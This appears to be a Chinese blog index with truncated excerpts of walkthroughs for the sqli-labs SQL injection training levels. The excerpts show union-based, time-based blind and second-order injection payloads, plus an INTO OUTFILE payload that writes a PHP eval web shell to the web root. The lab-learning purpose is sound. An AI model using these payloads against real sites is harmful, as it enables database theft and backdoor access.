weixin_43745072的博客

这关以来其实我就蒙了，界面过于复杂，后台php文件都有好几个。 阅读源码发现，所有地方都对输入进行了过滤。mysql_real_escape_string就是将特殊字符进行转移的函数。 除了一个地方->pass_change.php中，usermae是通过$_SESSION获取的，而$_SESSION中的参数是通过login.php中的参数设置的，这里根据代码分析，是传入的用户名。 注入，并在后台可以看到注入的真是语句为下图。 admin '# 在admin '#登录.

Less-23 注释符过滤 首先，在尝试'发现可以注入，但是在尝试注入之后一直报错。并且无论是#还是--+，回显都没有出现，初步判断是注释符过滤了。 查看源码可以看到，#和--+都被替换为了空字符。所以这次要考虑闭合掉引号，构造查询语句。 //filter the comments out so as to comments should not work $reg = "/#/"; $reg1 = "/--/"; $replace = ""; $id = preg_replace($reg, $

Less-18 对于这个关卡来说，后端代码对于name以及password都有过滤。那么我们在这里的注入就是不可行的。 function check_input($value) { if(!empty($value)) { // truncation (see comments) $value = substr($value,0,20); } // Stripslashes if magic quotes enabled if (get_magic_quotes_gpc()

information_schema information_schema这这个数据库中保存了MySQL服务器所有数据库的信息。 如数据库名，数据库的表，表栏的数据类型与访问权限等。 再简单点，这台MySQL服务器上，到底有哪些数据库、各个数据库有哪些表， 每张表的字段类型是什么，各个数据库要什么权限才能访问，等等信息都保存在information_schema里面。 information_schema的表schemata中的列schema_name记录了所有数据库的名字 information_sc.

转载请注明出处 Less-9 Less-9是一个盲注的，因为无论注入正确与否，返回的信息都是相同的。那么参考下Less-9的题目，我们可以看到，考虑基于时间的盲注。其原理主要是使用if函数，对字符串特定位置判断，为真就不操作，反之sleep(5) 首先查询表名。这里通过改变substr中下一个字符的值"`1"，以及对应的字符的值125。如果if判断的条件为真，那么就是字符匹配，就沉睡5s反之直接执行下一个字符匹配。 1' union select 1,If(ascii(substr(databa

Less-7 首先，这一关的要求是使用文件进行攻击 判断注入情况，此时两个情况输出是不同的，所以可以断定，这个时候存在注入点。 ?id=1')) and 1=1# ?id=1')) and 1=2# 看提示，本关要求的是使用文件注入，也就是我们要在网站创建后门进行攻击。可以考虑into outfile写入文件中 攻击载荷，注意：$_POST要大写 '<?php @eval($_POST["mima"])?>' into outfile "F:\\phpStudy\\WWW\\

less 1 寻找溢出点，判断注入类型 输入为1，显示正常 ?id=1 输入为1’，显示异常，并且输入为2-1，显示的是id=2的内容，初步判断是字符型注入。同时从报错的到数据库为mysql。 ?id=1' 注释引号，可以正常显示 ?id=1'# 判断有多少列，3不报错，4报错 ?id=-1' order by 3 # ?id=-1' order by 4 # 判断显示位，可以知道显示位是第2,3位 ?id=-1' union select 1,2,3 # 我们使